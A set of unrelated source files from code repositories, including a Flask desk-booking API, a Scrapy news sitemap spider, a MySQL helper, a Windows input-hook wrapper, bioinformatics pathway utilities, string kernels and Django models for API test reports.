    # 441 distinct values and is not guaranteed unique -- collisions would
    # merge unrelated bookings; confirm this is acceptable.
    numero_prenotazione = str(random.randint(1,21)*random.randint(1,21))
    # Base user (role 3): a single desk per booking.
    if(current_user.id_ruolo == 3):
        newPrenotazione = Prenotazione(id_utente = current_user.id, numero_prenotazione=numero_prenotazione, data = data['dataPrenotazione'], ora_inizio = data['oraInizio'], ora_fine = data['oraFine'], id_postazione = data['postazione'])
        db.session.add(newPrenotazione)
        db.session.commit()
        return jsonify({'success': 'Prenotazione effettuata'})
    else:
        # Privileged users: one row per requested desk, committed per row.
        for postazione in data['postazione']:
            newPrenotazione = Prenotazione(id_utente = current_user.id, numero_prenotazione=numero_prenotazione, data = data['dataPrenotazione'], ora_inizio = data['oraInizio'], ora_fine = data['oraFine'], id_postazione = postazione)
            db.session.add(newPrenotazione)
            db.session.commit()
        return jsonify({'success': 'Prenotazione multipla effettuata'})
@app.route('/prenotazione/<id_prenotazione>', methods=['GET'])
@token_required
def getOnePrenotazione(current_user, id_prenotazione):
    """Return a single reservation by its primary key as JSON.

    Fix: the original returned the Query object itself, which is always
    truthy (the not-found branch was unreachable) and is not JSON
    serializable by jsonify; fetch the row with .first() and serialize its
    fields explicitly, mirroring the other routes.
    """
    prenotazione = Prenotazione.query.filter(Prenotazione.id == id_prenotazione).first()
    if not prenotazione:
        return jsonify({'message': 'No prenotazione found'})
    result = {
        'id': prenotazione.id,
        'numero_prenotazione': prenotazione.numero_prenotazione,
        'data': str(prenotazione.data),
        'ora_inizio': str(prenotazione.ora_inizio),
        'ora_fine': str(prenotazione.ora_fine),
        'id_postazione': prenotazione.id_postazione,
    }
    return jsonify({'results': result})
@app.route('/prenotazione/<num_prenotazione>', methods=['DELETE'])
@token_required
def deletePrenotazione(current_user, num_prenotazione):
    """Delete every reservation row sharing the given booking number."""
    matches = Prenotazione.query.filter(Prenotazione.numero_prenotazione == num_prenotazione).all()
    if not matches:
        return jsonify({'message' : 'No prenotazione found!'})
    # One commit per row, as in the original implementation.
    for record in matches:
        db.session.delete(record)
        db.session.commit()
    return jsonify({'message': 'Prenotazione has been deleted'})
@app.route('/login')
def login():
    """Authenticate via HTTP Basic auth and return a 30-minute JWT.

    Responds 401 with a WWW-Authenticate challenge when credentials are
    missing, the user is unknown/inactive, or the password is wrong.
    """
    auth = request.authorization
    print(auth)
    if not auth or not auth.username or not auth.password:
        return make_response('NOT AUTH OR AUTH.USERNAME', 401, {'WWW-Authenticate' : 'Basic realm="login required"'})
    # Only active accounts (attivo == 1) may log in.
    user = User.query.filter(User.username == auth.username, User.attivo == 1).first()
    if not user:
        return make_response('Could not verify', 401, {'WWW-Authenticate' : 'Basic realm="login required"'})
    if check_password_hash(user.password, auth.password):
        # The token embeds the user's public_id and expires after 30 minutes.
        token = jwt.encode({'public_id': user.public_id, 'exp': datetime.datetime.utcnow() + datetime.timedelta(minutes = 30)}, app.config['SECRET_KEY'])
        user_data = {}
        user_data['username'] = user.username
        user_data['ruolo'] = user.id_ruolo
        return jsonify({'token': token.decode('UTF-8'), 'user': user_data})
    return make_response('Could not verify', 401, {'WWW-Authenticate' : 'Basic realm="login required"'})
if __name__ == '__main__':
app.run(port=5000) | michelecik/prenotaPostazioneUfficio | app.py | app.py | py | 9,983 | python | it | code | 0 | github-code | 90 |
43265905943 | import sys
from news_crawl.spiders.extensions_sitemap import ExtensionsSitemapSpider
class YomiuriCoJpSitemapSpider(ExtensionsSitemapSpider):
    """Sitemap spider for yomiuri.co.jp: crawls one daily post sitemap per
    day in the requested period."""
    name: str = 'yomiuri_co_jp_sitemap'
    allowed_domains: list = ['yomiuri.co.jp']
    sitemap_urls: list = []  # filled in __init__ from the sitemap_term_days argument
    _domain_name: str = 'yomiuri_co_jp'  # single source of the domain name used across the various processing steps
    spider_version: float = 1.0
    # When several sitemaps are listed in sitemap_urls, sitemap_filter runs
    # once per sitemap; this counter tracks which sitemap is currently being
    # processed so it can be identified.
    _sitemap_urls_count: int = 0
    # Template for the record layout (below the top-level key) written to the
    # crawler_controller collection; the top-level 'domain' key is kept fixed
    # regardless of site specifics.
    _sitemap_next_crawl_info: dict = {name: {}, }
    def __init__(self, *args, **kwargs):
        '''(Extended method)
        Runs additional initialization after the parent class __init__.
        '''
        super().__init__(*args, **kwargs)
        # Additional single-field validation: this spider requires the
        # sitemap_term_days argument.
        if not 'sitemap_term_days' in kwargs:
            sys.exit('引数エラー:当スパイダー(' + self.name +
                     ')の場合、sitemap_term_daysは必須です。')
        # Builds one URL per day, like:
        # 'https://www.yomiuri.co.jp/sitemap-pt-post-2021-05-04.xml',
        # 'https://www.yomiuri.co.jp/sitemap-pt-post-2021-05-03.xml',
        _sitemap_term_days_list = self.term_days_Calculation(
            self._crawl_start_time, int(self.kwargs_save['sitemap_term_days']), '%Y-%m-%d')
        self.sitemap_urls = [
            'https://www.yomiuri.co.jp/sitemap-pt-post-%s.xml' % (i) for i in _sitemap_term_days_list]
        self.logger.info('=== __init__ sitemap_urls 生成完了: %s',
                         self.sitemap_urls)
| pubranko/HatsuneMiku3 | news_crawl/spiders/yomiuri_co_jp_sitemap.py | yomiuri_co_jp_sitemap.py | py | 1,974 | python | ja | code | 0 | github-code | 90 |
70549545257 | import mysql.connector
from Manager import AccManage
from WRTools import ExcelHelp, PathHelp, LogHelper
# 建立数据库连接
cnx = mysql.connector.connect(
host=AccManage.mys['h'],
user=AccManage.mys['n'],
password=AccManage.mys['p'],
database="tender_info",
connection_timeout=180
)
def sql_write(sql, data):
    """Run an executemany() insert/replace with *data* and commit.

    Failures are appended to MySqlHelpLog.txt instead of being re-raised,
    so callers never observe the error.
    """
    try:
        # Create a cursor object on the shared module-level connection.
        print(f'write data:\n {data}')
        cursor = cnx.cursor()
        # Execute the bulk insert.
        cursor.executemany(sql, data)
        # Commit the transaction.
        cnx.commit()
        # Close the cursor; the shared connection stays open.
        cursor.close()
    except Exception as e:
        # NOTE(review): the log message contains the typo 'wirte'; it is a
        # runtime string and is left unchanged here.
        LogHelper.write_log(log_file_name= PathHelp.get_file_path('WRTools', 'MySqlHelpLog.txt'), content=f'yjcx_recommended wirte error {e} {data}')
def sql_read(sql):
    """Execute a SELECT statement on the shared connection and return all
    rows as a list (also echoed to stdout)."""
    cursor = cnx.cursor()
    cursor.execute(sql)
    rows = list(cursor.fetchall())
    cursor.close()
    print(f'read data:\n {rows}')
    return rows
def rts_render_A(data:list):
sql_str = "REPLACE INTO t_rts_tender_a(No, title_ru, starting_price, application_security, contract_security, status, published, apply_data, show_data, org_name, org_TinKpp, org_contact, cus_name, cus_TinKppReg, cus_contact, cus_address, detail_url, page, update_time) VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)"
sql_write(sql_str, data)
def rts_render_B(data:list):
sql_str = "REPLACE INTO t_rts_tender_b(No, title_ru, starting_price, application_security, contract_security, status, published, apply_data, show_data, org_name, org_TinKpp, org_contact, cus_name, cus_TinKppReg, cus_contact, cus_address, detail_url, page, update_time) VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)"
sql_write(sql_str, data)
if __name__ == "__main__":
rts_render_A()
| gree180160/YJCX_AI | WRTools/MySqlHelp_tender.py | MySqlHelp_tender.py | py | 2,108 | python | en | code | 0 | github-code | 90 |
17324280318 | from abc import ABC, abstractmethod
from .windows_messages import WinMessager
from threading import Event, local, Thread
from typing import Optional
from ctypes import wintypes
import ctypes
u32 = ctypes.windll.user32
k32 = ctypes.windll.kernel32
# Required for Windows callback events.
# When we set up a hook, we set our active class for that thread.
# During a callback event, we can then access that class.
local_data = local()
local_data.active_class = None
class Flags:
    """Constants for the Windows hook machinery."""
    HC_ACTION = 0  # nCode value meaning the callback carries a real event (checked in _generic_callback)
    hook_flag = 123  # custom wParam/lParam marker posted to request hook installation
    unhook_flag = 124  # custom marker for unhooking; appears unused in this module
    message_hook = 16  # custom thread-message id used with _post_message to drive (un)hooking
# This should not have two c_int types in it. Yet it the function we provide receives 3 arguments instead of all 4 of these.
HOOK_CALLBACK = ctypes.WINFUNCTYPE(ctypes.c_int, ctypes.c_int, wintypes.WPARAM, wintypes.LPARAM)
class WinHook(WinMessager):
"""
Handles Windows' HookEx management.
"""
    def __init__(self, allow_key_propagation=False):
        """Initialize hook state.

        allow_key_propagation: when True, intercepted events would also be
        passed on to the next hook in the chain; currently force-disabled
        on Windows (see the printed TODO below).
        """
        super().__init__()
        self.allow_key_propagation = allow_key_propagation
        if self.allow_key_propagation:
            self.allow_key_propagation = False
            print('TODO: Fix key_propagation (passive hook) on Windows.')
            print('Key propagation has been set to False.')
        self.is_hooked = Event()
        # This variable is accessed from different threads.
        # However, its access is synchronized using the self.is_hooked Event.
        self._hook_error: Optional[int] = None
        self._active_hook = None  # handle returned by SetWindowsHookExW while hooked
        self._hook_type = None  # hook type pending installation on the message thread
@abstractmethod
def _hook_callback(self, param, struct_pointer):
pass
def init_hook(self, hook_type):
if self.is_hooked.is_set():
raise EnvironmentError('Already hooked!')
self.start_windows_thread()
self._hook(hook_type)
if self._hook_error:
self.deinit_hook()
raise Exception('Error in an attempt to install hook. Error # {} {}'.format(
self._hook_error, ctypes.FormatError(self._hook_error)
)
)
def deinit_hook(self):
self.stop_windows_thread()
self._unhook()
def _hook(self, hook_type):
""" Registers a hook. """
self._hook_error = None
self._hook_type = hook_type
self._post_message(Flags.message_hook, Flags.hook_flag, Flags.hook_flag)
# Wait here for the other thread to initialize the hook.
self.is_hooked.wait(5)
if not self.is_hooked.is_set() or self._hook_error:
self.is_hooked.clear()
raise Exception('Unable to initialize hook. Error #', self._hook_error, k32.GetLastError())
def _windows_thread_grab(self, hook_type):
hook = u32.SetWindowsHookExW(hook_type, self._generic_callback, 0, 0)
if hook:
self._active_hook = hook
local_data.active_class = self
else:
self._grab_error = k32.GetLastError()
self.is_hooked.set()
def _unhook(self):
unhook_success = u32.UnhookWindowsHookEx(self._active_hook)
if unhook_success:
self._active_hook = None
self.is_hooked.clear()
else:
if self.is_hooked.is_set():
err = k32.GetLastError()
raise EnvironmentError('Unable to unhook from keyboard {}. Error # {} {}'.format(
self._active_hook, err, ctypes.FormatError(err)
))
def _windows_thread(self):
for get_msg, msg in super()._windows_thread():
if msg.message == Flags.message_hook and msg.wParam == Flags.hook_flag:
self._windows_thread_grab(self._hook_type)
self._hook_type = None
@staticmethod
@HOOK_CALLBACK
def _generic_callback(ncode, param2, struct_pointer):
if ncode != Flags.HC_ACTION or ncode < 0:
return u32.CallNextHookEx(0, ncode, param2, struct_pointer)
local_data.active_class._hook_callback(param2, struct_pointer)
if local_data.active_class.allow_key_propagation:
return u32.CallNextHookEx(0, ncode, param2, struct_pointer)
else:
return 1 | davis-b/keywatch | keywatch/windows/windows_hook.py | windows_hook.py | py | 3,620 | python | en | code | 0 | github-code | 90 |
15284184313 | ################## provide pathway gene list ##################
import pandas as pd
import numpy as np
import scipy.stats as stat
from collections import defaultdict
import os, time
## cancer geneset // PROVIDING IN GENE IDs
# MutSigDB Hallmark pathway genes
def hallmark_pathway():
    """Load the MSigDB hallmark gene sets from the bundled symbols file.

    Returns a dict mapping pathway name -> list of gene symbols; each
    tab-separated line holds the pathway name in column 0 and the genes in
    columns 2 onward (column 1 is skipped).
    """
    output = defaultdict(list)
    fi_directory = '/home/junghokong/PROJECT/bladder_cancer/code/1_SubtypeSimilarity/data/MSigDB_gene_set'
    f = open('%s/h.all.v6.1.symbols_2017_12_14.txt' %fi_directory, 'r')
    for line in f.readlines():
        line = line.strip().split('\t')
        pathway, geneList = line[0], line[2:]
        output[pathway] = geneList
    f.close()
    return output
def hallmark_pathway_uniprot():
# CONVERT GENE ID TO UNIPROT FOR HALLMARK GENE SETS
hallmark = hallmark_pathway()
hallmark_uniprot = defaultdict(set)
gene2uniprot = geneID2uniprot()
for pathway in hallmark:
for gene in hallmark[pathway]:
if gene in gene2uniprot:
uniprot = gene2uniprot[gene]
hallmark_uniprot[pathway].add(uniprot)
for pathway in hallmark_uniprot:
hallmark_uniprot[pathway] = list(hallmark_uniprot[pathway])
return hallmark_uniprot
def hallmark_pathway_total_geneList():
output = set()
hallmark = hallmark_pathway()
for pathway in hallmark:
for gene in hallmark[pathway]:
output.add(gene)
return list(output)
# CGC genes
def CGC_genes():
fi_directory = '/home/junghokong/PROJECT/bladder_cancer/code/1_SubtypeSimilarity/data/'
df = pd.read_table('%s/Cancer_Genome_Census_allFri Mar 30 05_12_48 2018.tsv' %fi_directory)
geneList = list(set(df['Gene Symbol']))
return geneList
# REACTOME genes
def reactome_genes(): # provide in a dictionary
    """Load the REACTOME gene sets from the bundled MSigDB symbols file.

    Returns a dict mapping each REACTOME pathway name to its list of gene
    symbols (columns 2 onward of the tab-separated line).

    Fix: iterate the file object directly instead of file.xreadlines(),
    which was removed in Python 3 (plain iteration is equivalent and also
    works in Python 2). The unused output_list accumulator was removed.
    """
    output = defaultdict(list)
    fi_directory = '/home/junghokong/PROJECT/bladder_cancer/co_work/propagate_and_NMF_cluster/data'
    f = open('%s/MSigDB_50_hallmark_gene_set/msigdb.v6.1.symbols.gmt.txt' %fi_directory,'r')
    for line in f:
        line = line.strip().split('\t')
        if 'REACTOME' in line[0]:
            reactome = line[0]
            for i in range(2, len(line)):
                gene = line[i]
                output[reactome].append(gene)
    f.close()
    return output
def reactome_genes_uniprot():
output, reactome = defaultdict(list), reactome_genes()
gene2uniprot = geneID2uniprot()
for pathway in reactome:
for gene in reactome[pathway]:
if gene in gene2uniprot:
uniprot = gene2uniprot[gene]
if not uniprot in output[pathway]:
output[pathway].append(uniprot)
return output
# KEGG genes
def kegg_genes(): # provide in a dictionary
    """Load the KEGG gene sets from the bundled MSigDB symbols file.

    Returns a dict mapping each KEGG pathway name to its list of gene
    symbols (columns 2 onward of the tab-separated line).

    Fix: iterate the file object directly instead of file.xreadlines(),
    which was removed in Python 3 (plain iteration is equivalent and also
    works in Python 2). The unused output_list accumulator was removed.
    """
    output = defaultdict(list)
    fi_directory = '/home/junghokong/PROJECT/bladder_cancer/co_work/propagate_and_NMF_cluster/data'
    f = open('%s/MSigDB_50_hallmark_gene_set/msigdb.v6.1.symbols.gmt.txt' %fi_directory,'r')
    for line in f:
        line = line.strip().split('\t')
        if 'KEGG' in line[0]:
            kegg = line[0]
            for i in range(2, len(line)):
                gene = line[i]
                output[kegg].append(gene)
    f.close()
    return output
def kegg_genes_uniprot():
output, kegg = defaultdict(list), kegg_genes()
gene2uniprot = geneID2uniprot()
for pathway in kegg:
for gene in kegg[pathway]:
if gene in gene2uniprot:
uniprot = gene2uniprot[gene]
if not uniprot in output[pathway]:
output[pathway].append(uniprot)
return output
# ------------------------------------------------------------------------------------------------
## gene annotation conversion utilities
def convert_geneList_to_uniprotList( input_geneList ):
    """Map gene symbols to UniProt IDs via the module-level gene2uniprot
    table, dropping unknown symbols and duplicates (order is unspecified)."""
    mapped = {gene2uniprot[symbol] for symbol in input_geneList if symbol in gene2uniprot}
    return list(mapped)
def convert_uniprotList_to_geneList( input_uniprotList ):
    """Map UniProt IDs to gene symbols via the module-level uniprot2gene
    table, dropping unknown IDs and duplicates (order is unspecified)."""
    mapped = {uniprot2gene[acc] for acc in input_uniprotList if acc in uniprot2gene}
    return list(mapped)
## gene annotation
# ensembl gene annotation
def annotation():
geneID2ensembl, ensembl2geneID = defaultdict(set), {}
fi_directory = '/home/junghokong/PROJECT/bladder_cancer/code/1_SubtypeSimilarity/data'
df = pd.read_table('%s/2017_07_31_biomart_protein_coding_genes.txt' %fi_directory)
for i in range(len(df)):
geneID, ensembl = df['Gene name'][i], df['Gene stable ID'][i]
geneID2ensembl[ geneID ].add( ensembl )
ensembl2geneID[ ensembl ] = geneID
for geneID in geneID2ensembl:
geneID2ensembl[geneID] = list(geneID2ensembl[geneID])
return geneID2ensembl, ensembl2geneID
def ensembl2geneID():
output = {} # { ensembl : geneID }
fi_directory = '/home/junghokong/PROJECT/bladder_cancer/code/8_hESC/data'
df = pd.read_table('%s/2017_07_31_biomart_protein_coding_genes.txt' %fi_directory)
for i in range(len(df)):
ensembl, gene = df['Gene stable ID'][i], df['Gene name'][i]
output[ensembl] = gene
return output
def geneID2uniprot():
output = {} # { gene ID : uniprot ID }
fi_directory = '/home/junghokong/PROJECT/bladder_cancer/code/8_hESC/data'
df = pd.read_table('%s/uniprot_homoSapiens_multipleGeneName_20180802.tab' %fi_directory)
for i in range(len(df)):
uniprot, geneList = df['Entry'][i], df['Gene names'][i]
if pd.isnull(geneList) == False:
geneList = geneList.split()
for gene in geneList:
output[gene] = uniprot
return output
def uniprot2geneID():
output = {} # { uniprot ID : gene ID }
fi_directory = '/home/junghokong/PROJECT/bladder_cancer/code/8_hESC/data'
df = pd.read_table('%s/uniprot_homoSapiens_multipleGeneName_20180802.tab' %fi_directory)
for i in range(len(df)):
uniprot, geneList = df['Entry'][i], df['Gene names'][i]
if pd.isnull(geneList) == False:
geneList = geneList.split()
gene = geneList[0]
output[uniprot] = gene
return output
gene2uniprot, uniprot2gene = geneID2uniprot(), uniprot2geneID()
| SBIlab/SGI_cancer_recurrence_NIMO | code/scripts/transcriptome_methylome_signature_comparison/pathway_utilities.py | pathway_utilities.py | py | 6,576 | python | en | code | 0 | github-code | 90 |
# Read n and the n heights, then print the total boost needed so that no
# value is below the running maximum seen so far.
# Fix: removed the unused `l = [0] * len(A)` allocation from the original.
n = int(input())  # count of values; the line must be consumed even though n itself is unused below
A = list(map(int, input().split()))
ans = 0
m = A[0]  # running maximum so far
for h in A:
    if m > h:
        ans += m - h  # raise this value up to the running maximum
    else:
        m = h
print(ans)
| Aasthaengg/IBMdataset | Python_codes/p02578/s754561965.py | s754561965.py | py | 162 | python | zh | code | 0 | github-code | 90 |
30972353166 | #coding:utf-8
"""
Propriété : maniere de manipuler/controler des attributs
principe d'encapsulation!
exemple ici: age = property(_getage, _setage, _delage,)
le menento c'est ce fichers
"""
class Humain:
    """This class represents a human. For built-in help, run: help(Humain)."""
    def __init__(self, nom, age, ):
        self.nom = nom
        self._age = age
    def _getage(self):
        # Format the age with the correct French plural ("an" vs "ans").
        if self._age <= 1:
            return str(self._age) + " an ."# a cleaner way would be: "{} {}".format(self._age, "an")
        else:
            return str(self._age) + " ans ."# a cleaner way would be: "{} {}".format(self._age, "ans")
    """
    try:
        return self._age
    except AttributeError :
        print("L'age n'existe pas !")
    def _setage(self,new_age):
        if new_age <= 0:
            self._age = 0
        else :
            self._age = new_age
    def _delage(self ):
        del self._age
    """
    #property(<getter>,<setter>,<deleter>, helper)
    # Read-only property: only the getter is registered; the setter/deleter
    # above are disabled (dead code inside the string literal).
    age = property(_getage) #, _setage , _delage , "age variable qui definie l'age d'une humain")
#h1 = Humain(1001, 5 )
#print(h1.age)
#h1.age = -12
#print(h1.age)
#help(Humain)
h1 = Humain("jason champagne", 1)
print("{} a {}".format(h1.nom, h1.age))
| novenopatch/Youtube_formation | Jason_champagne/13_propriété/propriété.py | propriété.py | py | 1,386 | python | fr | code | 1 | github-code | 90 |
2101519207 | import numpy as np
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.preprocessing import LabelEncoder
def phi(x, y, l, j_x, j_y, d):
"""Calculate spectrum features for spectrum kernel.
phi is a mapping of a row of matrix x into a |alphabet|^l
dimensional feature space. For each sequence in x,
each dimension corresponds to one of the |alphabet|^l
possible strings s of length l and is the count of
the number of occurrance of s in x.
Paramters
---------------------------------------------------
x : string
a row of the data matrix
y : string
a row of the data matrix
l : int, default 3
number of l-mers (length of 'word')
j_x : int
start position of sequence in x
j_y : int
start position of sequence in y
d : int
the length of analysed sequence
j + d is end position of sequence
Returns
----------------------------------------------------
embedded_x: array
1 * num_embedded_features
embedded_y: array
1 * num_embedded_features
"""
sentences = []
sequence_x= x[j_x:j_x + d]
words_x = [sequence_x[a:a+l] for a in range(len(sequence_x) - l + 1)]
sentence_x = ' '.join(words_x)
sentences.append(sentence_x)
sequence_y= y[j_y:j_y + d]
words_y = [sequence_y[a:a+l] for a in range(len(sequence_y) - l + 1)]
sentence_y = ' '.join(words_y)
sentences.append(sentence_y)
cv = CountVectorizer(analyzer='word',token_pattern=u"(?u)\\b\\w+\\b")
#cv = CountVectorizer()
embedded = cv.fit_transform(sentences).toarray()
#print(embedded)
return embedded[0], embedded[1]
def inverse_label(x):
    """Convert a label-encoded sequence back to a DNA string.

    Each element of x is an integer label produced by a LabelEncoder fitted
    on the alphabet ['A', 'C', 'G', 'T']; the decoded bases are joined into
    a single string, e.g. [0, 1] -> 'AC'.
    """
    le = LabelEncoder()
    bases = ['A','C','G','T']
    le.fit(bases)
    # Coerce every element to int so floats/strings of digits also decode.
    int_x = []
    for i in x:
        int_x.append(int(i))
    #print(int_x)
    inverse_x = le.inverse_transform(int_x)
    inverse_x = ''.join(e for e in inverse_x)
    #print(inverse_x)
    return inverse_x
def spectrum_kernel_pw(x, y=None, gamma = 1.0, l = 3, j_x = 0, j_y = 0, d = None):
"""
Compute the spectrum kernel between x and y:
k_{l}^{spectrum}(x, y) = <phi(x), phi(y)>
for each pair of rows x in x and y in y.
when y is None, y is set to be equal to x.
Parameters
----------
x : string
a row of the data matrix
y : string
a row of the data matrix
gamma: float, default is 1.
parameter require by gaussain process kernel.
l : int, default 3
number of l-mers (length of 'word')
j_x : int
start position of sequence in x
j_y : int
start position of sequence in y
d : int, default None
if None, set to the length of sequence
d is the length of analysed sequence
j + d is end position of sequence
Returns
-------
kernel_matrix : array of shape (n_samples_x, n_samples_y)
"""
if y is None:
y = x
x = inverse_label(x)
y = inverse_label(y)
if d is None:
d = len(x)
# sequence cannot pass the check
# x, y = check_pairwise_arrays(x, y)
phi_x, phi_y = phi(x, y, l, j_x, j_y, d)
return phi_x.dot(phi_y.T)
def mixed_spectrum_kernel_pw(x, y=None, gamma = 1.0, l = 3):
    """Mixed spectrum kernel between two sequences.

    k(x, y) = sum_{d=1..l} beta_d * k_d^{spectrum}(x, y)
    with beta_d = 2 * (l - d + 1) / (l**2 + 1). When y is None it defaults
    to x. The gamma argument is accepted for Gaussian-process kernel API
    compatibility and does not affect the computation.
    """
    if y is None:
        y = x
    total = 0
    for d in range(1, l + 1):
        weight = 2.0 * (l - d + 1) / (l ** 2 + 1)
        total += weight * spectrum_kernel_pw(x, y, l=d)
    return total
def WD_kernel_pw(x, y=None, gamma = 1.0, l = 3):
"""Weighted degree kernel.
Compute the mixed spectrum kernel between x and y:
k(x, y) = \sum_{d = 1}^{l} \sum_j^{L-d}
beta_d k_d^{spectrum}(x[j:j+d],y[j:j+d])
for each pair of rows x in X and y in Y.
when Y is None, Y is set to be equal to X.
beta_d = 2 frac{l - d + 1}{l^2 + 1}
Parameters
----------
X : array of shape (n_samples_X, )
each row is a sequence (string)
Y : array of shape (n_samples_Y, )
each row is a sequence (string)
gamma: float, default is 1.
parameter require by gaussain process kernel.
l : int, default 3
number of l-mers (length of 'word')
Returns
-------
kernel_matrix : array of shape (n_samples_X, n_samples_Y)
"""
if y is None:
y = x
k = 0
# assume all seq has the same total length
L = len(x)
for d in range(1, l+1):
#print(d)
for j in range(0, L - d + 1):
beta = 2 * float(l - d + 1)/float(l ** 2 + 1)
k+= beta * spectrum_kernel_pw(x, y, l = d, j_x = j, j_y = j, d = d)
return k
def WD_shift_kernel_pw(x, y=None, gamma = 1.0, l = 3, shift_range = 1):
"""Weighted degree kernel with shifts.
Compute the mixed spectrum kernel between X and Y:
K(x, y) = \sum_{d = 1}^{l} \sum_j^{L-d} \sum_{s=0 and s+j <= L}
beta_d * gamma_j * delta_s *
(k_d^{spectrum}(x[j+s:j+s+d],y[j:j+d]) + k_d^{spectrum}(x[j:j+d],y[j+s:j+s+d]))
for each pair of rows x in X and y in Y.
when Y is None, Y is set to be equal to X.
beta_d = 2 frac{l - d + 1}{l^2 + 1}
gamma_j = 1
delta_s = 1/(2(s+1))
TODO: to confirm why shift useful?
Parameters
----------
X : array of shape (n_samples_X, )
each row is a sequence (string)
Y : array of shape (n_samples_Y, )
each row is a sequence (string)
gamma: float, default is 1.
parameter require by gaussain process kernel.
l : int, default 3
number of l-mers (length of 'word')
shift_range: int, default 1
number of shifting allowed
Returns
-------
kernel_matrix : array of shape (n_samples_X, n_samples_Y)
"""
if y is None:
y = x
k = 0
L = len(x) # assume all seq has the same total length
for d in range(1, l+1):
#print(d)
for j in range(0, L - d + 1):
for s in range(shift_range+1): # range is right open
if s + j <= L:
beta = 2 * float(l - d + 1)/float(l ** 2 + 1)
delta = 1.0/(2 * (s + 1))
k += beta * delta * (spectrum_kernel_pw(x, y, l = d, \
j_x = j+s, j_y = j,d = d) + \
spectrum_kernel_pw(x, y, l = d, j_x = j, j_y = j+s, d= d))
return k
| chengsoonong/eheye | SynBio/codes/kernels_pairwise.py | kernels_pairwise.py | py | 7,095 | python | en | code | 4 | github-code | 90 |
33392056432 | from django.db import models
# Create your models here.
class TempExtractData(models.Model): # 保存临时提出并转换后的数据
onlyCode = models.CharField('唯一随机ID', max_length=100, null=True)
keys = models.CharField('key', max_length=100, null=True)
values = models.TextField('value', null=True)
valueType = models.CharField('值类型', max_length=50, null=True)
createTime = models.DateTimeField('创建时间', auto_now=True)
class ApiTestReport(models.Model): # 一级主报告列表
pid = models.ForeignKey("ProjectManagement.ProManagement", to_field='id', on_delete=models.CASCADE)
reportName = models.CharField("报告名称", max_length=50, null=False)
reportType = models.CharField("报告类型(API:单接口,CASE:测试用例,TASK:定时任务,BATCH:批量任务)", max_length=10, null=False)
taskId = models.CharField("ApiId/CaseId/TaskId/BatchId,根据任务类型来取", max_length=10, null=False)
apiTotal = models.IntegerField("统计总需要执行的接口数量", null=False)
reportStatus = models.CharField("测试报告状态(Pass,Fail,Error)", max_length=10, null=False)
runningTime = models.FloatField("运行总时间", null=True)
createTime = models.DateTimeField('创建时间', auto_now=True)
updateTime = models.DateTimeField('修改时间', auto_now=True)
uid = models.ForeignKey(to='login.UserTable', to_field='id', on_delete=models.CASCADE) # 用户Id
is_del = models.IntegerField("是否删除(1:删除,0:不删除)", null=False)
class ApiReportTaskItem(models.Model): # 二级批量任务列表
testReport = models.ForeignKey("ApiTestReport", to_field='id', on_delete=models.CASCADE) # 主报告ID
task = models.ForeignKey("Api_TimingTask.ApiTimingTask", to_field='id', on_delete=models.CASCADE)
taskName = models.CharField("定时任务名称", max_length=50, null=True)
runningTime = models.FloatField("运行总时间", null=True)
successTotal = models.IntegerField("成功数", null=False)
failTotal = models.IntegerField("失败数", null=False)
errorTotal = models.IntegerField("错误数", null=False)
updateTime = models.DateTimeField('修改时间', auto_now=True)
is_del = models.IntegerField("是否删除(1:删除,0:不删除)", null=False)
class ApiReportItem(models.Model): # 二级报告列表
testReport = models.ForeignKey("ApiTestReport", to_field='id', on_delete=models.CASCADE) # 主报告ID
apiId = models.ForeignKey("Api_IntMaintenance.ApiBaseData", to_field='id', on_delete=models.CASCADE) # 接口ID
apiName = models.CharField("接口名称", max_length=50, null=True)
case_id = models.IntegerField("单接口没有此ID/Case,Task,Batch类型时这里显示CaseId", null=True) # 这个接口出自哪个用例的
batchItem_id = models.IntegerField("Batch类型时才有此ID", null=True)
runningTime = models.FloatField("运行总时间", null=True)
successTotal = models.IntegerField("成功数", null=False)
failTotal = models.IntegerField("失败数", null=False)
errorTotal = models.IntegerField("错误数", null=False)
updateTime = models.DateTimeField('修改时间', auto_now=True)
is_del = models.IntegerField("是否删除(1:删除,0:不删除)", null=False)
class ApiReport(models.Model): # 三级用例报告
reportItem = models.ForeignKey("ApiReportItem", to_field='id', on_delete=models.CASCADE) # 二级报告表ID
requestUrl = models.CharField('请求地址', max_length=100, null=False)
requestType = models.CharField("请求类型(GET/POST)", max_length=50, null=False)
requestHeaders = models.TextField('请求头部', null=True)
requestData = models.TextField('请求数据', null=True)
reportStatus = models.CharField("测试报告状态(Pass,Fail,Error)", max_length=10, null=False)
statusCode = models.IntegerField("返回代码", null=True)
responseHeaders = models.TextField('返回头部', null=True)
responseInfo = models.TextField('返回信息', null=True)
requestExtract = models.TextField('请求提取信息', null=True)
requestValidate = models.TextField('请求断言信息', null=True)
responseValidate = models.TextField('返回断言信息', null=True)
preOperationInfo = models.TextField('前置操作返回信息', null=True)
rearOperationInfo = models.TextField('后置操作返回值', null=True)
errorInfo = models.TextField('错误信息', null=True)
runningTime = models.CharField("运行总时间", max_length=50, null=True)
updateTime = models.DateTimeField('修改时间', auto_now=True)
is_del = models.IntegerField("是否删除(1:删除,0:不删除)", null=False)
class WarningInfo(models.Model): # 用于测试报告显示
testReport = models.ForeignKey("ApiTestReport", to_field='id', on_delete=models.CASCADE) # 主报告ID
triggerType = models.CharField("触发类型(Warning,Error)", max_length=20, null=False)
taskId = models.CharField("ApiId/CaseId/TaskId/BatchId,根据任务类型来取", max_length=10, null=False)
taskName = models.CharField("接口/用例/定时任务的名称", max_length=50, null=False)
info = models.TextField('信息', null=True)
updateTime = models.DateTimeField('修改时间', auto_now=True)
uid = models.ForeignKey(to='login.UserTable', to_field='id', on_delete=models.CASCADE) # 用户Id
class ApiQueue(models.Model): # 队列信息
pid = models.ForeignKey("ProjectManagement.ProManagement", to_field='id', on_delete=models.CASCADE)
page_id = models.IntegerField("所属页面", null=True)
fun_id = models.IntegerField("所属功能", null=True)
taskType = models.CharField('任务类型(API:单接口,Case,Task:定时任务,batch:批量任务)', max_length=50, null=False)
taskId = models.IntegerField("任务ID,apiId,CaseId,TaskId,BatchId", null=False)
testReport = models.ForeignKey("ApiTestReport", to_field='id', on_delete=models.CASCADE) # 主报告id
queueStatus = models.IntegerField("队列执行状态(0:未开始,1:执行中,2:已结束)", null=False)
